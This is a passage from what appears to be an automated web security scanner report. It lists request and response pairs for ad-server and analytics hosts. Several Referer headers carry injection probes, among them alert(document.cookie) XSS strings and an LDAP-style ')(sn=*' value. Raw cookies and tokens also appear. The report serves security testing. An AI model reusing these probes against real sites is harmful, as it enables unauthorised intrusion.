Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5220
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 01:29:44 GMT
Expires: Sun, 30 Jan 2011 01:29:44 GMT
Discarded: true

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...

32.7. http://ad.doubleclick.net/adi/N3973.MSN/B4412732.159

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3973.MSN/B4412732.159

Request

GET /adi/N3973.MSN/B4412732.159;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD00037/26000000000150232.1?!&&PID=8016549&UIT=G&TargetID=28253486&AN=420169787&PG=INVPC3&ASID=9d895293b9e448ef860f80a5ea38d6d2&destination=;ord=420169787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 12:56:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 695

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2A
...[SNIP]...

32.8. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.6

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.MSNMEN/B3889285.6

Request

GET /adi/N4319.MSNMEN/B3889285.6;sz=728x90;;sz=728x90;ord=146794379?click=http://clk.atdmt.com/goiframe/198094467.198102269/148848786/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/148848786/direct;;wi.728;hi.90/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:30:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9f/4/4d/%2a/n
...[SNIP]...

32.9. http://ad.doubleclick.net/adi/N4319.msn/B2087123.383

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4319.msn/B2087123.383

Request

GET /adi/N4319.msn/B2087123.383;sz=728x90;;sz=728x90;ord=177637523?click=http://clk.redcated/goiframe/196246413.198101735/139941180/direct/01%3fhref= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/139941180/direct;;wi.728;hi.90/01?click=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 01:24:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4832

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...

32.10. http://ad.doubleclick.net/adi/N4441.microsoftonline/B5073082

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4441.microsoftonline/B5073082

Request

GET /adi/N4441.microsoftonline/B5073082;sz=300x250;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003K/86000000000035072.1?!&&PID=8000152&UIT=G&TargetID=26475342&AN=2016493885&PG=NBCMSB&ASID=512095d5931b4fa2ae9bebe971835c5e&destination=;ord=2016493885? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 17:55:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 646

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2A
...[SNIP]...

32.11. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/73000000000032314.1?!&&PID=8261482&UIT=G&TargetID=37486885&AN=1781205665&PG=NBCSAT&ASID=35822a3e79a24077bdcc19b1cd979a9d&destination=;ord=1781205665? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 12:49:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6443

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

32.12. http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6036.149339.MICROSOFTONLINE/B5123903.4

Request

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=8195334&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 12:54:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6573

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

32.13. http://ad.doubleclick.net/adi/tigerdirect.com/Section_2_House

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/tigerdirect.com/Section_2_House

Request

GET /adi/tigerdirect.com/Section_2_House;sz=977x40;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.tigerdirect.com/applications/SearchTools/item-details.asp?EdpNo=6532393796d4'%3balert(document.cookie)//5a2dd2f7153
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 448
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 15:14:42 GMT
Expires: Sun, 30 Jan 2011 15:14:42 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/
...[SNIP]...

32.14. http://ad.doubleclick.net/clk

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clk

Request

GET /clk HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test_cookie=CheckForPermission;

Response

HTTP/1.1 500 Error: Not a valid request
Content-Type: text/html
Content-Length: 45
Date: Sat, 29 Jan 2011 23:45:09 GMT
Server: GFE/2.0
Connection: close

<h1>Error 500 Error: Not a valid request</h1>

32.15. http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adsc/d775684/10/38973908/decide.php

Request

GET /adsc/d775684/10/38973908/decide.php HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:48:34 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: a227.dl
Set-Cookie: linkjumptest=1; path=/; domain=.questionmarket.com
Set-Cookie: CS1=deleted; expires=Sat, 30-Jan-2010 14:48:33 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1; expires=Thu, 22-Mar-2012 06:48:34 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-`bzsM-0; expires=Thu, 22-Mar-2012 06:48:34 GMT; path=/; domain=.questionmarket.com;
Cache-Control: post-check=0, pre-check=0
Content-Length: 1
Content-Type: text/html

;

32.16. http://amch.questionmarket.com/adscgen/st.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Request

GET /adscgen/st.php?survey_num=852149&site=58143061&code=40142779&randnum=5845715 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:27:29 GMT
Server: Apache
DL_S: a211
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 164
Content-Type: text/html

(function(){
if(1!=4){
(new Image).src="http://amch.questionmarket.com/adsc/d852149/4/40142779/decide.php?ord="+Math.floor((new Date()).getTime()/1000);


}
})();


32.17. http://analytics.live.com/Sync.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytics.live.com
Path:   /Sync.html

Request

GET /Sync.html?V=3525&AQNT=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.redacted/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: analytics.live.com
If-Modified-Since: Mon, 08 Jun 2009 11:01:13 GMT
If-None-Match: "eff9f76f28e8c91:a04"
Proxy-Connection: Keep-Alive
Cookie: MUID=AD04D6F8B2FF44629973BD0674351135; wlidperf=throughput=5&latency=610

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=604800
ntCoent-Length: 607
Content-Type: text/html
Last-Modified: Mon, 08 Jun 2009 11:01:13 GMT
Accept-Ranges: bytes
ETag: "eff9f76f28e8c91:5c8"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:36 GMT
Content-Length: 607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sync</title>
...[SNIP]...

32.18. http://analytics.microsoft.com/Sync.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytics.microsoft.com
Path:   /Sync.html

Request

GET /Sync.html HTTP/1.1
Host: analytics.microsoft.com
Proxy-Connection: keep-alive
Referer: http://ajax.microsoft.com/ajax/jQuery/jquery-1.3.2.min.js'
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_NVR_RU=0=technet:1=:2=; MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=NbkBuOI4W7cBv1mnAHhVbMOQZR4pSFpAnK7y46YYoMuoTqVfvpOJDTYUAUbtS2cNI8BvaR+SCC23nZMTeytyi7wNmiKQoC0huKoVOxO9PG4349NCx7DVlNmV/I4bkLVsQPDWI9Bsqfw4CAigE1dAh1BYCtKZo9uqxkgiGwXq+e0k2CWQBMJydEvQvf+a8Nmy0lBvBx9sMp029vD2knhH9q3cjQbZxn3d/T9SCIAmvvv/s2I5E7D3U2bYKmXA8D2pYaGjWhFIkGPPBwVNdZM0gBNghumGYE3ytU+ILnGMVeSvePI6D6PqDJrflWnDWzImxN5OE1evuVhNxF+HLtGrIkyVXonl+BTy57QP6nzOR8xDTgEwSjCHY8/Bk9JyRwZg7yIiU4jUEbrdJT2XMDr4AswK4Wiy1TGrclwPTNsTA9c0XB9nYdOMBy66L0gCAgZ5Xl2KxwR+ak8o2EGeRwJddAgw92owb1NRPjd/6vkOYqly9qWJu5Yj/8uUccCK8nxtzsHYjQ2KgbbGdKcZOJMx5arSS+8FsBl+/Opeqt5VTOk=&Microsoft.MicrosoftId=0237-9950-5424-5770; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; omniID=1294458843112_6a73_9555_4be9_86ce555049db; msdn=L=1033; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; ixpLightBrowser=0

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=604800
ntCoent-Length: 607
Content-Type: text/html
Last-Modified: Mon, 08 Jun 2009 11:01:13 GMT
Accept-Ranges: bytes
ETag: "eff9f76f28e8c91:a15"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo", policyref="http://privacy.redacted/w3c/p3p.xml"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 14:50:53 GMT
Content-Length: 607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sync</title>
...[SNIP]...

32.19. http://analytics.redacted/Include.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytics.redacted
Path:   /Include.html

Request

GET /Include.html HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://analytics.live.com/Sync.html?V=3525&AQNT=1
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: analytics.redacted
If-Modified-Since: Mon, 08 Jun 2009 11:01:13 GMT
If-None-Match: "eff9f76f28e8c91:5d1"
Proxy-Connection: Keep-Alive
Cookie: MC1=V=3&GUID=ba5bfd32d9c7455bac6f7e474b8b5676; mh=MSFT; CC=US; CULTURE=EN-US; expid=id=2f286e706b7d43c2be7bbf23323df6c5&bd=2011-01-01T01:18:30.906&v=2; Sample=63; MUID=AD04D6F8B2FF44629973BD0674351135; VWCUK200=L011811/Q64026_11991_1473_011811_1_011911_399989x399774x011811x1x1/Q64225_11684_1473_010711_1_010717_400767x395011x010711x1x1/Q63195_11726_1473_010411_1_010417_395612x394987x010411x1x1

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=604800
ntCoent-Length: 464
Content-Type: text/html
Last-Modified: Mon, 08 Jun 2009 11:01:13 GMT
Accept-Ranges: bytes
ETag: "eff9f76f28e8c91:823"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo", policyref="http://privacy.redacted/w3c/p3p.xml"
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:26:39 GMT
Content-Length: 464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sync</title>
...[SNIP]...

32.20. http://analytics.redacted/sync.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://analytics.redacted
Path:   /sync.html

Request

GET /sync.html HTTP/1.1
Host: analytics.redacted
Proxy-Connection: keep-alive
Referer: http://investing.money.redacted/investments/charts?Symbol=indu22b72%22%3balert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=604800
ntCoent-Length: 607
Content-Type: text/html
Last-Modified: Mon, 08 Jun 2009 11:01:13 GMT
Accept-Ranges: bytes
ETag: "eff9f76f28e8c91:9ed"
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo", policyref="http://privacy.redacted/w3c/p3p.xml"
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 13:00:12 GMT
Content-Length: 607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sync</title>
...[SNIP]...

32.21. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2117809&PluID=0&w=300&h=60&ord=35801428&ifrm=1&ncu=$$http://g.redacted/_2AD0003L/79000000000085282.1?!&&PID=7902678&UIT=G&TargetID=28253485&AN=35801428&PG=INVPC2&ASID=a610568226dd43348f3d9fefa630960e$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A3=f+JvabEk02WG00002h5iUabNA07l00000Qh5j3abNz07l00000.gn3Ka4JO09MY00001gNfHaaiN0aVX00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gy5Da9bU0c9M00001gCTVa9bU0c9M00001; B3=7lgH0000000001sG89PS000000000QsZ89PT000000000.sZ852G0000000003sS7dNH0000000002sZ83xP0000000001sF8cVQ0000000001sV6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=h5j3abNz07l00000.h5iUabNz07l00000Qf+JvabEk02WG00002gNfHaaiN0aVX00001gn3Ka4JO09MY00001fU+La50V0a+r00001fUFGa50V02WG00001cRreabeg03Dk00001gy7La9bU0c9M00003gCTVa9bU0c9M00001gy5Da9bU0c9M00001gvKEacgY0c9M00001; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=89PS000000000QsZ7lgH0000000001sG89PT000000000.sZ852G0000000003sS7dNH0000000002sZ8cVQ0000000001sV83xP0000000001sF852N0000000001s.6o.Q0000000001sY7gi30000000001sG852z0000000001sS852A0000000001sS; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 30-Apr-2011 07:56:45 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 30 Jan 2011 12:56:45 GMT
Connection: close
Content-Length: 2204

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

32.22. http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.pulse360.com
Path:   /42EBFC62-1F4E-11E0-AB70-41F5E4064C68

Request

GET /42EBFC62-1F4E-11E0-AB70-41F5E4064C68 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:19:39 GMT
Server: Barista/1.1-(eanibm)
Connection: Close
Content-Length: 7634
Content-Type: text/html
P3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"

document.write('<style type="text/css"> div#p360-hybrid300x250slateplain-42EBFC62-1F4E-11E0-AB70-41F5E4064C68 { width: 300px; left: 0; font-family: sans-serif; position: relative; displa
...[SNIP]...

32.23. http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.pulse360.com
Path:   /517F9430-C0FA-11DF-831B-94A93FF5047F

Request

GET /517F9430-C0FA-11DF-831B-94A93FF5047F HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
